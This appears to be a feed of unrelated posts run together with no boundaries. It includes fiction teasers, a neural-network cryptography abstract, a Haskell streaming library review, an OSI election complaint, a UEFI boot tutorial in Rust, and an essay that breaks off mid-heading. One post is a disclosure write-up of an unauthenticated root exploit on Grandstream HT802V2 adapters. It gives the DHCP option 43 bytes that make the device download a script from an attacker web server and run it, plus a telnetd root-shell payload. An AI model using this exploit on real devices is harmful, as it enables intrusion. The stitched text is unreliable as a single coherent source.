Author: Mark Renney For Tanner, each name as it appeared on his list was merely a statistic, albeit one it was his job to render obsolete. He was all too aware that there were levels and some of them had sunk deeper into the quagmire than others. But he had always believed it was important […]
Abstract: The wide adoption of deep neural networks (DNNs) raises the question of how can we equip them with a desired cryptographic functionality (e.g, to decrypt an encrypted input, to verify that this input is authorized, or to hide a secure watermark in the output). The problem is that cryptographic primitives are typically designed to run on digital computers that use Boolean gates to map sequences of bits to sequences of bits, whereas DNNs are a special type of analog computer that uses linear mappings and ReLUs to map vectors of real numbers to vectors of real numbers. This discrepancy between the discrete and continuous computational models raises the question of what is the best way to implement standard cryptographic primitives as DNNs, and whether DNN implementations of secure cryptosystems remain secure in the new setting, in which an attacker can ask the DNN to process a message whose “bits” are arbitrary real numbers.
In this paper we lay the foundations of this new theory, defining the meaning of correctness and security for implementations of cryptographic primitives as ReLU-based DNNs. We then show that the natural implementations of block ciphers as DNNs can be broken in linear time by using such nonstandard inputs. We tested our attack in the case of full round AES-128, and had success rate in finding randomly chosen keys. Finally, we develop a new method for implementing any desired cryptographic functionality as a standard ReLU-based DNN in a provably secure and correct way. Our protective technique has very low overhead (a constant number of additional layers and a linear number of additional neurons), and is completely practical.
First, let's briefly discuss and define streaming in this context.
Structure and Interpretation of Computer Programs introduces Streams
as an analogue of lists, to support delayed evaluation. In brief, the
inductive list type (a list is either an empty list or a head element
pre-pended to another list) is replaced with a structure with a head
element and a promise which, when evaluated, will generate the tail
(which in turn may have a head element and a promise to generate another
tail, culminating in the equivalent of an empty list.) Later on SICP
also covers lazy evaluation.
However, the streaming we're talking about originates in the relational
community, rather than the functional one, and is subtly different. It's
about building a pipeline of processing that receives and emits data but
doesn't need to (indeed, cannot) reference the whole stream (which may
be infinite) at once.
Conduit is the oldest of the ones I am reviewing here, but I doubt it's
the first in the Haskell ecosystem. If I've made any obvious omissions,
please let me know!
Conduit provides a new set of types to model streaming data, and a completely
new set of functions which are analogues of standard Prelude functions, e.g.
sumC in place of sum. It provides its own combinator(s) such as .| (
aka fuse)
which is like composition but reads left-to-right.
The motivation for this is to enable (near?) constant memory usage for
processing large streams of data -- presumably versus using a list-based
approach and to provide some determinism: the README gives the example of
"promptly closing file handles". I think this is another way of saying
that it uses strict evaluation, or at least avoids lazy evaluation for
some things.
Conduit offers interleaved effects: which is to say, IO can be performed
mid-stream.
Conduit supports distributed operation via Data.Conduit.Network in the
conduit-extra package. Michael Snoyman, principal Conduit author, wrote
up how to use it here: https://www.yesodweb.com/blog/2014/03/network-conduit-async
To write a distributed Conduit application, the application programmer must
manually determine the boundaries between the clients/servers and write specific
code to connect them.
The Pipes
Tutorial
contrasts itself with "Conventional Haskell stream programming": whether that
means Conduit or something else, I don't know.
Paraphrasing their pitch: Effects, Streaming Composability: pick two. That's
the situation they describe for stream programming prior to Pipes. They argue
Pipes offers all three.
Pipes offers it's own combinators (which read left-to-right)
and offers interleaved effects.
At this point I can't really see what fundamentally distinguishes Pipes from
Conduit.
Pipes has some support for distributed operation via the sister library
pipes-network. It
looks like you must send and receive ByteStrings, which means rolling
your own serialisation for other types. As with Conduit, to send or receive
over a network, the application programmer must divide their program up
into the sub-programs for each node, and add the necessary ingress/egress
code.
io-streams emphasises simple primitives. Reading and writing is done
under the IO Monad, thus, in an effectful (but non-pure) context. The
presence or absence of further stream data are signalled by using the
Maybe type (Just more data or Nothing: the producer has finished.)
It provides a library of functions that shadow the standard Prelude, such
as S.fromList, S.mapM, etc.
It's not clear to me what the motivation for io-streams is, beyond
providing a simple interface. There's no declaration of intent that I can find
about (e.g.) constant-memory operation.
There's no mention of or support (that I can find) for distributed
operation.
Similar to io-streams, Streaming emphasises providing a simple
interface that gels well with traditional Haskell methods. Streaming
provides effectful streams (via a Monad -- any Monad?) and a collection
of functions for manipulating streams which are designed to closely
mimic standard Prelude (and Data.List) functions.
Streaming doesn't push its own combinators: the examples provided
use $ and read right-to-left.
The motivation for Streaming seems to be to avoid memory leaks caused by
extracting pure lists from IO with traditional functions like mapM,
which require all the list constructors to be evaluated, the list to be
completely deconstructed, and then a new list constructed.
Like io-streams, the focus of the library is providing a low-level
streaming abstraction, and there is no support for distributed operation.
Streamly appears to have the grand goal of providing a unified programming
tool as suited for quick-and-dirty programming tasks (normally the domain of
scripting languages) and high-performance work (C, Java, Rust, etc.). Their
intended audience appears to be everyone, or at least, not just existing
Haskell programmers. See their rationale
Streamly offers an interface to permit composing concurrent (note: not
distributed) programs via combinators. It relies upon fusing a streaming
pipeline to remove intermediate list structure allocations and de-allocations
(i.e. de-forestation, similar to GHC rewrite rules)
The examples I've seen use standard combinators (e.g. Control.Function.&,
which reads left-to-right, and Applicative).
Streamly provide benchmarks
versus Haskell pure lists, Streaming, Pipes and Conduit: these generally
show Streamly several orders of magnitude faster.
I'm finding it hard to evaluate Streamly. It's big, and it's focus is wide.
It provides shadows of Prelude functions, as many of these libraries do.
wrap-up
It seems almost like it must be a rite-of-passage to write a streaming system
in Haskell. Stones and glass houses, I'm guilty of that
too.
The focus of the surveyed libraries is mostly on providing a streaming
abstraction, normally with an analogous interface to standard Haskell lists.
They differ on various philosophical points (whether to abstract away the
mechanics behind type synonyms, how much to leverage existing Haskell idioms,
etc). A few of the libraries have some rudimentary support for distributed
operation, but this is limited to connecting separate nodes together: in some
cases serialising data remains the application programmer's job, and in all
cases the application programmer must manually carve up their processing
according to a fixed idea of what nodes they are deploying to. They all
define a fixed-function pipeline.
The Open Source Initiative has two classes of board seats: Affiliate seats, and Individual Member seats.
In the upcoming election, each affiliate can nominate a candidate, and each affiliate can cast a vote for the Affiliate candidates, but there's only 1 Affiliate seat available. I initially expressed interest in being nominated as an Affiliate candidate via Debian. But since Bradley Kuhn is also running for an Affiliate seat with a similar platform to me, especially with regards to the OSAID, I decided to run as part of an aligned "ticket" as an Individual Member to avoid contention for the 1 Affiliate seat.
Bradley and I discussed running on a similar ticket around 8/9pm Pacific, and I submitted my candidacy around 9pm PT on 17 February.
I was dismayed when I received the following mail from Nick Vidal:
Dear Luke,
Thank you for your interest in the OSI Board of Directors election. Unfortunately, we are unable to accept your application as it was submitted after the official deadline of Monday Feb 17 at 11:59 pm UTC. To ensure a fair process, we must adhere to the deadline for all candidates.
We appreciate your enthusiasm and encourage you to stay engaged with OSI’s mission. We hope you’ll consider applying in the future or contributing in other meaningful ways.
The OSI's contact address is in California, so it seems arbitrary and capricious to retroactively define all of these processes as being governed by UTC.
I was not able to participate in the "potential board director" info sessions accordingly, but people who attended heard that the importance of accommodating differing TZ's was discussed during the info session, and that OSI representatives mentioned they try to accommodate TZ's of everyone. This seems in sharp contrast with the above policy.
I urge the OSI to reconsider this policy and allow me to stand for an Individual seat in the current cycle.
We like trains here at Error'd, and you all seem to like trains
too. That must be the main reason we get so many submissions about broken
information systems.
"Pass," said
Jozsef
. I think that train might have crashed already.
An anonymous subscriber shared an epic tale some time ago. They explained thus.
"(I couldn't capture in the photo, but the next station after Duivendrecht was showing the time of 09:24+1.)
We know Europe has pretty good trains, and even some high-speed
lines. But this was the first time I boarded a time-traveling train.
At first I was annoyed to be 47 minutes late. I thought I could easily walk
from Amsterdam Centraal to Muiderpoort in less than the 53 minutes that
this train would take. But I was relieved to know the trip to the further
stations was going to be quicker, and I would arrive there even before
arriving at the earlier stations."
I think the explanation here is that this train is currently expected
to arrive at Muiderport around 10:01. But it's still projected to
arrive at the following stop at 9:46, and more surprisingly at the
successive stops at 9:35 and 9:25.
Railfan
Richard B.
recently shared
"Points failure on the West Coast Main Line has disrupted the linear nature of time."
and quite some time ago, he also sent us this snap, singing
"That train that's bound for glory? It runs through here."
An unrelated
David B. wonders
"When is the next train? We don't know, it's running incognito."
And finally, courageous
Ivan
got sideways underground.
"Copenhagen subway system may have fully automated trains,
but their informational screens need a little manual help every now and then."
[Advertisement]
Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!
Author: David Barber Mr Wells having already written a popular scientific romance about time travel, publishers seemed to think my own literary efforts on the subject suffered by comparison. They also warned my title would be a hindrance to commercial success. One editor commented that making the protagonist a woman was even less believable than […]
Yesterday i released a new version of
virtnbdbackup with a nice
improvement.
The new version can now detect zeroed regions in the bitmaps by comparing the
block regions against the state within the base bitmap during incremental
backup.
This is helpful if virtual machines run fstrim, as it results in less backup
footprint. Before the incremental backups could grow the same amount of size as
fstrimmed data regions.
I also managed to enhance the tests by using the arch linux cloud images. The
automated github CI tests now actually test backup and restores against a
virtual machine running an real OS.
As of today, Rcpp stands at 3001
reverse-dependencies on CRAN.
The graph on the left depicts the growth of Rcpp usage (as measured by Depends,
Imports and LinkingTo, but excluding Suggests) over time.
Rcpp was first released in November 2008. It took seven year years to
clear 500
packages in late October 2015 after which usage of R and Rcpp accelerated: 1000
packages in April 2017, 1500
packages in November 2018, 2000
packages in July 2020, and 2500
package in February 2022. The chart extends to the very beginning
via manually compiled data from CRANberries and
checked with crandb.
The core part of the data set is generated semi-automatically when
updating a (manually curated) list of packages using Rcpp that is available
too.
The Rcpp team aims to keep Rcpp as
performant and reliable as it has been (and see e.g.here for more
details). Last month’s 1.0.14
release post is a good example of the ongoing work. A really big
shoutout and Thank You! to all users and contributors
of Rcpp for help, suggestions, bug
reports, documentation or, of course, code.
I can’t remember exactly the joke I was making at the time in my
work’s slack instance (I’m sure it wasn’t particularly
funny, though; and not even worth re-reading the thread to work out), but it
wound up with me writing a UEFI binary for the punchline. Not to spoil the
ending but it worked - no pesky kernel, no messing around with “userland”. I
guess the only part of this you really need to know for the setup here is that
it was a Severance joke,
which is some fantastic TV. If you haven’t seen it, this post will seem perhaps
weirder than it actually is. I promise I haven’t joined any new cults. For
those who have seen it, the payoff to my joke is that I wanted my machine to
boot directly to an image of
Kier Eagan.
As for how to do it – I figured I’d give the uefi
crate a shot, and see how it is to use,
since this is a low stakes way of trying it out. In general, this isn’t the
sort of thing I’d usually post about – except this wound up being easier and
way cleaner than I thought it would be. That alone is worth sharing, in the
hopes someome comes across this in the future and feels like they, too, can
write something fun targeting the UEFI.
First thing’s first – gotta create a rust project (I’ll leave that part to you
depending on your life choices), and to add the uefi crate to your
Cargo.toml. You can either use cargo add or add a line like this by hand:
uefi = { version = "0.33", features = ["panic_handler", "alloc", "global_allocator"] }
We also need to teach cargo about how to go about building for the UEFI target,
so we need to create a rust-toolchain.toml with one (or both) of the UEFI
targets we’re interested in:
Unfortunately, I wasn’t able to use the
image crate,
since it won’t build against the uefi target. This looks like it’s
because rustc had no way to compile the required floating point operations
within the image crate without hardware floating point instructions
specifically. Rust tends to punt a lot of that to libm usually, so this isnt
entirely shocking given we’re nostd for a non-hardfloat target.
So-called “softening” requires a software floating point implementation that
the compiler can use to “polyfill” (feels weird to use the term polyfill here,
but I guess it’s spiritually right?) the lack of hardware floating point
operations, which rust hasn’t implemented for this target yet. As a result, I
changed tactics, and figured I’d use ImageMagick to pre-compute the pixels
from a jpg, rather than doing it at runtime. A bit of a bummer, since I need
to do more out of band pre-processing and hardcoding, and updating the image
kinda sucks as a result – but it’s entirely manageable.
This will take our input file (kier.jpg), resize it to get as close to the
desired resolution as possible while maintaining aspect ration, then convert it
from a jpg to a flat array of 4 byte RGBA pixels. Critically, it’s also
important to remember that the size of the kier.full.jpg file may not actually
be the requested size – it will not change the aspect ratio, so be sure to
make a careful note of the resulting size of the kier.full.jpg file.
Last step with the image is to compile it into our Rust bianary, since we
don’t want to struggle with trying to read this off disk, which is thankfully
real easy to do.
Remember to use the width and height from the final kier.full.jpg file as the
values for KIER_WIDTH and KIER_HEIGHT. KIER_PIXEL_SIZE is 4, since we
have 4 byte wide values for each pixel as a result of our conversion step into
RGBA. We’ll only use RGB, and if we ever drop the alpha channel, we can drop
that down to 3. I don’t entirely know why I kept alpha around, but I figured it
was fine. My kier.full.jpg image winds up shorter than the requested height
(which is also qemu’s default resolution for me) – which means we’ll get a
semi-annoying black band under the image when we go to run it – but it’ll
work.
Anyway, now that we have our image as bytes, we can get down to work, and
write the rest of the code to handle moving bytes around from in-memory
as a flat block if pixels, and request that they be displayed using the
UEFI GOP. We’ll just need to hack up a container
for the image pixels and teach it how to blit to the display.
/// RGB Image to move around. This isn't the same as an
/// `image::RgbImage`, but we can associate the size of
/// the image along with the flat buffer of pixels.
structRgbImage {
/// Size of the image as a tuple, as the
/// (width, height)
size: (usize, usize),
/// raw pixels we'll send to the display.
inner: Vec<BltPixel>,
}
impl RgbImage {
/// Create a new `RgbImage`.
fnnew(width: usize, height: usize) -> Self {
RgbImage {
size: (width, height),
inner: vec![BltPixel::new(0, 0, 0); width * height],
}
}
/// Take our pixels and request that the UEFI GOP
/// display them for us.
fnwrite(&self, gop: &mut GraphicsOutput) -> Result {
gop.blt(BltOp::BufferToVideo {
buffer: &self.inner,
src: BltRegion::Full,
dest: (0, 0),
dims: self.size,
})
}
}
impl Index<(usize, usize)>for RgbImage {
typeOutput= BltPixel;
fnindex(&self, idx: (usize, usize)) -> &BltPixel {
let (x, y) = idx;
&self.inner[y * self.size.0+ x]
}
}
impl IndexMut<(usize, usize)>for RgbImage {
fnindex_mut(&mut self, idx: (usize, usize)) -> &mut BltPixel {
let (x, y) = idx;
&mut self.inner[y * self.size.0+ x]
}
}
We also need to do some basic setup to get a handle to the UEFI
GOP via the UEFI crate (using
uefi::boot::get_handle_for_protocol
and
uefi::boot::open_protocol_exclusive
for the GraphicsOutput
protocol), so that we have the object we need to pass to RgbImage in order
for it to write the pixels to the display. The only trick here is that the
display on the booted system can really be any resolution – so we need to do
some capping to ensure that we don’t write more pixels than the display can
handle. Writing fewer than the display’s maximum seems fine, though.
fnpraise() -> Result {
let gop_handle = boot::get_handle_for_protocol::<GraphicsOutput>()?;
letmut gop = boot::open_protocol_exclusive::<GraphicsOutput>(gop_handle)?;
// Get the (width, height) that is the minimum of
// our image and the display we're using.
let (width, height) = gop.current_mode_info().resolution();
let (width, height) = (width.min(KIER_WIDTH), height.min(KIER_HEIGHT));
letmut buffer = RgbImage::new(width, height);
for y in0..height {
for x in0..width {
let idx_r = ((y * KIER_WIDTH) + x) * KIER_PIXEL_SIZE;
let pixel =&mut buffer[(x, y)];
pixel.red = KIER[idx_r];
pixel.green = KIER[idx_r +1];
pixel.blue = KIER[idx_r +2];
}
}
buffer.write(&mut gop)?;
Ok(())
}
Not so bad! A bit tedious – we could solve some of this by turning
KIER into an RgbImage at compile-time using some clever Cow and
const tricks and implement blitting a sub-image of the image – but this
will do for now. This is a joke, after all, let’s not go nuts. All that’s
left with our code is for us to write our main function and try and boot
the thing!
#[entry]fnmain() -> Status {
uefi::helpers::init().unwrap();
praise().unwrap();
boot::stall(100_000_000);
Status::SUCCESS
}
If you’re following along at home and so interested, the final source is over at
gist.github.com.
We can go ahead and build it using cargo (as is our tradition) by targeting
the UEFI platform.
While I can definitely get my machine to boot these blobs to test, I figured
I’d save myself some time by using QEMU to test without a full boot.
If you’ve not done this sort of thing before, we’ll need two packages,
qemu and ovmf. It’s a bit different than most invocations of qemu you
may see out there – so I figured it’d be worth writing this down, too.
$ doas apt install qemu-system-x86 ovmf
qemu has a nice feature where it’ll create us an EFI partition as a drive and
attach it to the VM off a local directory – so let’s construct an EFI
partition file structure, and drop our binary into the conventional location.
If you haven’t done this before, and are only interested in running this in a
VM, don’t worry too much about it, a lot of it is convention and this layout
should work for you.
With all this in place, we can kick off qemu, booting it in UEFI mode using
the ovmf firmware, attaching our EFI partition directory as a drive to
our VM to boot off of.
If all goes well, soon you’ll be met with the all knowing gaze of
Chosen One, Kier Eagan. The thing that really impressed me about all
this is this program worked first try – it all went so boringly
normal. Truly, kudos to the uefi crate maintainers, it’s incredibly
well done.
Booting a live system
Sure, we could stop here, but anyone can open up an app window and see a
picture of Kier Eagan, so I knew I needed to finish the job and boot a real
machine up with this. In order to do that, we need to format a USB stick.
BE SURE /dev/sda IS CORRECT IF YOU’RE COPY AND PASTING. All my drives
are NVMe, so BE CAREFUL – if you use SATA, it may very well be your
hard drive! Please do not destroy your computer over this.
$ doas fdisk /dev/sda
Welcome to fdisk (util-linux 2.40.4).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-4014079, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4014079, default 4014079):
Created a new partition 1 of type 'Linux' and of size 1.9 GiB.
Command (m for help): t
Selected partition 1
Hex code or alias (type L to list all): ef
Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Once that looks good (depending on your flavor of udev you may or
may not need to unplug and replug your USB stick), we can go ahead
and format our new EFI partition (BE CAREFUL THAT /dev/sda IS YOUR
USB STICK) and write our EFI directory to it.
$ doas mkfs.fat /dev/sda1
$ doas mount /dev/sda1 /mnt
$ cp -r esp/efi /mnt
$ find /mnt
/mnt
/mnt/efi
/mnt/efi/boot
/mnt/efi/boot/bootx64.efi
Of course, naturally, devotion to Kier shouldn’t mean backdooring your system.
Disabling Secure Boot runs counter to the Core Principals, such as Probity, and
not doing this would surely run counter to Verve, Wit and Vision. This bit does
require that you’ve taken the step to enroll a
MOK and know how
to use it, right about now is when we can use sbsign to sign our UEFI binary
we want to boot from to continue enforcing Secure Boot. The details for how
this command should be run specifically is likely something you’ll need to work
out depending on how you’ve decided to manage your MOK.
I figured I’d leave a signed copy of boot2kier at
/boot/efi/EFI/BOOT/KIER.efi on my Dell XPS 13, with Secure Boot enabled
and enforcing, just took a matter of going into my BIOS to add the right
boot option, which was no sweat. I’m sure there is a way to do it using
efibootmgr, but I wasn’t smart enough to do that quickly. I let ‘er rip,
and it booted up and worked great!
It was a bit hard to get a video of my laptop, though – but lucky for me, I
have a Minisforum Z83-F sitting around (which, until a few weeks ago was running
the annual http server to control my christmas tree
) – so I grabbed it out of the christmas bin, wired it up to a video capture
card I have sitting around, and figured I’d grab a video of me booting a
physical device off the boot2kier USB stick.
Attentive readers will notice the image of Kier is smaller then the qemu booted
system – which just means our real machine has a larger GOP display
resolution than qemu, which makes sense! We could write some fancy resize code
(sounds annoying), center the image (can’t be assed but should be the easy way
out here) or resize the original image (pretty hardware specific workaround).
Additionally, you can make out the image being written to the display before us
(the Minisforum logo) behind Kier, which is really cool stuff. If we were real
fancy we could write blank pixels to the display before blitting Kier, but,
again, I don’t think I care to do that much work.
But now I must away
If I wanted to keep this joke going, I’d likely try and find a copy of the
original
video when Helly 100%s her file
and boot into that – or maybe play a terrible midi PC speaker rendition of
Kier, Chosen One, Kier after
rendering the image. I, unfortunately, don’t have any friends involved with
production (yet?), so I reckon all that’s out for now. I’ll likely stop playing
with this – the joke was done and I’m only writing this post because of how
great everything was along the way.
All in all, this reminds me so much of building a homebrew kernel to boot a
system into – but like, good, though, and it’s a nice reminder of both how
fun this stuff can be, and how far we’ve come. UEFI protocols are light-years
better than how we did it in the dark ages, and the tooling for this is SO
much more mature. Booting a custom UEFI binary is miles ahead of trying to
boot your own kernel, and I can’t believe how good the uefi crate is
specifically.
Praise Kier! Kudos, to everyone involved in making this so delightful ❤️.
The Grandstream HT802V2 uses busybox' udhcpc for DHCP.
When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data.
On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
According to the documentation the format is <option_code><value_length><value>.
The only documented option code is 0x01 for the ACS URL.
However, if you pass other codes, these are accepted and parsed too.
Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh.
What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/shTEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1TEST_SERVER_PORT=8080cd/tmp
wget-q-t2-T5http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}if["$?"="0"];thenecho"Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"chmod+x${TEST_SCRIPT}corefile_dec${TEST_SCRIPT}if["`head -n 1 ${TEST_SCRIPT}`"="#!/bin/sh"];thenecho"Starting GS Test Suite..."./${TEST_SCRIPT}http://${TEST_SERVER}:${TEST_SERVER_PORT}fifi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget.
We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915.
But we also can just let the script download the file and execute it for us.
The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed.
I have no idea how the encryption works.
But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things!
The result gets correctly decrypted by corefile_dec back to the needed payload.
That means we can take a simple payload like:
#!/bin/sh# you need exactly that shebang, yes
telnetd-l/bin/sh-p1270&
Encrypt it using encfile and place it on a webserver as vendor_test.sh.
The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port.
This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222.
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't).
And boom, root shell on port 1270 :)
As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable.
Both of these variables were controllable using the existing gs_config interface after authentication.
But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)
Affected devices
HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
Most probably also other HT8xxV2, as they use the same firmware
Most probably also HT8xx(V1), as their /usr/share/udhcpc/default.script and /app/bin/vendor_test_suite.sh look very similar, according to firmware dumps
Fix
After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/shTEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1TEST_SERVER_PORT=8080VENDOR_SCRIPT="/tmp/run_vendor.sh"cd/tmp
wget-q-t2-T5http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}if["$?"="0"];thenecho"Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"chmod+x${TEST_SCRIPT}prov_image_dec--in${TEST_SCRIPT}--out${VENDOR_SCRIPT}if["`head -n 1 ${VENDOR_SCRIPT}`"="#!/bin/sh"];thenecho"Starting GS Test Suite..."chmod+x${VENDOR_SCRIPT}${VENDOR_SCRIPT}http://${TEST_SERVER}:${TEST_SERVER_PORT}fifi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.
The goal of this code is simply to do something for every day within a range of dates. These two approaches vary a bit in terms of readability though.
I guess the loop in the functional version isn't mutating anything, I suppose. But honestly, I'm surprised that this didn't take the extra step of using the .ForEach function (which takes a lambda and applies it to each parameter). Heck, with that approach, they could have done this whole thing in a single statement.
[Advertisement]
Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.
Author: Daniel Rogers I’m to be sacrificed tomorrow. I knew I wasn’t going to like this planet, but when your fighter decides to crash, it doesn’t ask how you feel about it. Gline-doth is a class C Primitive. I’m a little rusty on my planet classifications, but I believe it means they use rudimentary tools […]
JOIN US IN PERSON AND ONLINE for K Allado-McDowell's Long Now Talk, On Neural Media, on February 25, 02025 at 7 PM PT at the Cowell Theater in San Francisco.
Neural Media
Over the last decade, I’ve watched AI challenge — and augment — humanity in astonishing ways. Every few years, a new innovation seems to raise the same questions: can we compute human intelligence? Can our labor be automated? Who owns these systems and their training data? How will this technology reshape society? Yet there is one question I rarely hear asked: how will AI change our understanding of ourselves?
All media influence our sense of identity. In a previous essay, I examined how older media types altered subjectivity, in deliberate and unforeseen ways, and developed an evolutionary framework of media types. It begins with broadcast media (such as radio and television), which were molded into immersive media (from museum exhibitions and laser shows to Burning Man and VR), and later network media (from home computing to social media, short-form video, and memes). AI appears last, in a new category I called “neural media,” which also includes any medium that incorporates neural structures, such as brain-computer interfaces.
Each media type structures identity differently. Broadcast media produce demographic identities. Immersive media produce democratic or self-constructed identities. Network media produce fractal identities. And neural media produce embedded identities.
The purpose of this framework was to compare and contrast historical media types through the space, content, and identity they produce. I described an increasing fractalization of identity made possible by more complex and recursive methods of audience sensing. The demographic blocks that describe television viewers (age, gender, race, location) are crude compared to the AI embeddings that adtech systems use to describe today’s web users. Online political identity now has many facets and variations that do not easily map to a 20th century two-party system or left-right spectrum.
In the words of Marshall McLuhan, “The content of any medium is always another medium.” In my framework, media types mature — and consume their predecessors — in 30-year phases. In the early 02010s, we began to feel the effects of the mature network media form, just as neural media appeared.
We are now, in 02025, 15 years into neural media, halfway through its maturation cycle. That is to say, neural media are still relatively malleable. Given that they will have profound effects on every aspect of culture and subjectivity, it’s imperative that we address them as a psychosocial force, before their structures become fixed. How we do this will determine neural media’s influence on 21st century identity.
Embedded Identity
Media shape identity and subjectivity through feedback loops. Twentieth century broadcasters, in pursuit of accurate advertising targets, used devices like the Audimeter to measure viewer demographics. This information allowed broadcasters to produce content that appealed to, and shaped, specific groups of viewers. In a media environment built with AI, human users are perceived and reflected not through demography but through statistical distributions. In the same way that programmed television shows reinforced demographic aspects of identity, neural media reinforce identities as they are perceived by machines, that is, as locations (or embeddings1) in a statistical landscape.
Every interaction we have with AI involves being seen, interpreted, and reflected through this hidden landscape or latent space. For example, imagine a credit system that uses AI to assign scores to borrowers. This reduces a complex data set (my credit history) to a single number, which can drastically alter my ability to rent or buy a home. Similarly, my driving behavior, as measured by computers in modern automobiles, is ingested by machine learning in order to predict accidents and determine my insurance rate. Social media algorithms control what I see in my feed, and how my personal profile is exposed, with downstream effects on my social life, politics, and employment.
Many dimensions of daily life today are determined by one’s position in an AI model’s latent space. These perceptions have material consequences that inevitably influence my sense of self, even if I disagree with them. In a world increasingly run by AI, we navigate both physical and latent space simultaneously. So it’s increasingly important that we understand what it means to identify as an embedding in a statistical model.
Being Statistical
One need not look far for examples of embedded and statistical self-identification in culture today. Dating app users describe themselves in terms of percentiles and distributions. ("I'm in the top 20% for height.”) Social media platforms provide statistical metrics for one’s online profile. ("My engagement rate is in the top 10%.”) Personality systems, like the MBTI, Big Five, or Kegan scale — not to mention popular astrology and derivatives like Human Design — encourage people to discuss their own traits within statistical distributions. (“INTJs make up about 2% of the population, while manifestos make up 9%.”) Fitness tracking via biomarkers and wearable devices provides a statistical frame for both physical and social identity, and new psychological theories describe states of mind in topological terms.
While it’s clear that the statistical model of subjectivity is already present and influential, specific statistical terms and concepts remain opaque to the average user, with a few exceptions, notably the bell curve. A bell curve is a visual rendering of the “normal distribution.” Its mean, median, and mode are all equal, and occur at the center of the distribution, producing the signature symmetrical bell shape. The bell curve has been used for financial analysis, psychometry, and medicine, but also as a justification for racist ideas about human intelligence.
Such uses of the bell curve are satirized in a popular meme format, in which an idiot and a genius occupy the curve’s far ends. They share the same simple opinion on a topic (e.g., “You can just do things”). Both disagree with a third character, the midwit perched atop the curve. Unlike both idiot and genius, the midwit is mired in ideology and overthinking (e.g., “Doing things requires formal accreditation and institutional permission”). This meme humorously indulges in Ken Wilber’s pre/trans fallacy (in which pre-rational intuition is equated with transcendent post-rational insight) to express the normie’s contemptible position in the normal distribution. To the knowing insider (and the terminally online), “mid” always equals bad.
Being mid
The slang term mid is now used to refer to anything of middling or mediocre quality, the most commonplace artifacts and opinions one finds at the center of the normal distribution. The term originates in cannabis grades; mid refers to strains that are neither strong nor weak. Mids could be seen as inferior products. Yet in a newly legal cannabis market, characterized by an arms race of cultivation, a mid experience might be preferable to one optimized for competitive metrics like THC content. The term mid entered circulation and was applied to other subjects like attractiveness and aesthetics, becoming a useful handle on the statistical self-image experienced by embedded subjects.
The most potent embodiment of mid-ness might be what is now called “AI Slop.” The term describes the default content generated by AI models. AI slop is hard to pin down, but like pornography, you know it when you see it. Like a fast casual food bowl, mass market action movie, or fabricated pop diva, AI slop is made to please the largest possible audience, yet satisfies no one. It prioritizes its economic function above all else, filling a void with minimum viable content, ignoring any aesthetic, nutritive, or meaningful possibility.
Fortunately, we can define AI slop in somewhat more precise technical terms, because it originates at the center of a bell curve, specifically the bell curve used to optimize VAEs, or variable auto-encoders, the underlying architecture of early AI image generators. In order to smooth the distribution of data and ensure consistent images, VAEs conformed data sets to a normal distribution during training, resulting in the visual language of early GAN art.
Language models are based on probabilities, and they also default to slop. The LLM property called temperature controls the range of acceptable probabilities for selected next tokens (tokens are roughly equivalent to words). A low temperature setting produces only the most predictable language. At a high temperature, outputs are random, surprising, sometimes chaotic or confusing. Just like AI image generators that hallucinate the most common image associated with a prompt, LLM base models generate content at the mean, the metaphorical peak of the curve. In other words, they are built to be mid.2
We might be tempted to call these midpoint representations of objects and ideas iconic or archetypal, but they are not. Iconic imagery is powerful because it is specific. The broadcast images of the 20th century achieved iconicity in specific times and places. Historic turning points were captured in images broadcast worldwide in realtime. The sudden psychic imprint of a broadcast image might evoke an archetypal pattern beyond a specific moment or culture. Think of the Hindenburg disaster and Icarus’s melting wings, or the lone protestor in Tiananmen Square and David fighting Goliath, the falling Twin Towers and the Tower card in a Tarot deck. In contrast to iconic specificity or archetypal resonance, hallucinated content is a synthetic blur of training data absorbed into a latent attractor. While the default face or color palette learned by an image generator might be attractive, it is by definition, mid. This kind of midness is the source of AI slop’s distinctive blandness, and a strong, unacknowledged force in contemporary aesthetics.
Being slop
